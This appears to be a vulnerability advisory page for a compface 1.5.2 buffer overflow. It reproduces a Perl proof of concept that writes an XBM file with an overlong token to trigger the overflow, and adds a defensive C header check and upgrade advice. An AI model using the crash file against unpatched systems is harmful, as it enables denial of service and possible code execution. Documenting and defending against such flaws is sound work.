Vendor: compface
By: metalhoney
CVSS: 7,5 (HIGH)
Buffer Overflow
CWE: 120
Product Name: compface
Affected Version From: 1.5.2 and earlier
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian and Ubuntu
2009

compface <= 1.5.2 buffer overflow PoC

A buffer overflow vulnerability exists in compface version 1.5.2 and earlier. It is triggered when the application processes a specially crafted XBM file. An attacker can exploit it to execute arbitrary code.

Mitigation:

Upgrade to the latest version of compface.

Exploit-DB raw data:

#!/usr/bin/perl
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################
# compface <= 1.5.2 buffer overflow p o c
# vuln only exists on debian and ubuntu? - packages.debian.org/compface -
# author: metalhoney ------- metalhoney1@hotmail.com -------
#########################################################################
open(ISLAM,">allah.xbm") or die;
print ISLAM "#define noname_width 48\n#define noname_height 48\n";
print ISLAM "static ";
print ISLAM "A"x184;
print ISLAM " char = {\n";
close(ISLAM) or die;
print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n";
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################

# milw0rm.com [2009-06-17]
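
The proof of concept above puts a 184-character token into the XBM declaration line. The following is an added example, not compface's code and not part of the original advisory: a C pre-check that rejects an untrusted XBM header containing an overlong token or an implausible width or height before the file reaches a parser. The function name, return codes and the limits MAX_TOKEN and MAX_DIM are assumptions chosen for illustration; the page does not identify the vulnerable routine or its buffer size.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_TOKEN 64   /* assumed identifier limit, not taken from compface */
#define MAX_DIM   1024 /* assumed sanity bound on width and height */
enum { XBM_OK = 0, XBM_LONG_TOKEN = -1, XBM_BAD_DIM = -2, XBM_NO_BODY = -3 };

static int ends_with(const char *s, const char *suffix)
{
    size_t n = strlen(s), m = strlen(suffix);
    return n >= m && strcmp(s + n - m, suffix) == 0;
}

/* Check everything before the first '{' of an XBM file held in buf[0..len). */
int xbm_check_header(const char *buf, size_t len)
{
    char prev[MAX_TOKEN + 1] = "", tok[MAX_TOKEN + 1];
    long width = 0, height = 0;
    size_t i = 0;

    while (i < len && buf[i] != '{') {
        if (isspace((unsigned char)buf[i])) { i++; continue; }
        size_t n = 0;
        while (i < len && buf[i] != '{' && !isspace((unsigned char)buf[i])) {
            if (n == MAX_TOKEN)          /* token would not fit: reject, */
                return XBM_LONG_TOKEN;   /* never copy past the buffer   */
            tok[n++] = buf[i++];
        }
        tok[n] = '\0';
        if (ends_with(prev, "_width"))  width  = strtol(tok, NULL, 10);
        if (ends_with(prev, "_height")) height = strtol(tok, NULL, 10);
        memcpy(prev, tok, n + 1);        /* n <= MAX_TOKEN, so this fits */
    }
    if (i == len) return XBM_NO_BODY;    /* no '{': not an XBM bitmap */
    if (width < 1 || width > MAX_DIM || height < 1 || height > MAX_DIM)
        return XBM_BAD_DIM;
    return XBM_OK;
}

int main(void)
{
    /* Constructed sample: a well-formed 48x48 XBM header. */
    const char *ok = "#define noname_width 48\n#define noname_height 48\n"
                     "static char noname_bits[] = {\n";
    printf("well-formed header -> %d\n", xbm_check_header(ok, strlen(ok)));
    return 0;
}
```

A non-zero result is a reason to drop or quarantine the file instead of passing it to an unpatched compface; the check complements the upgrade and does not replace it.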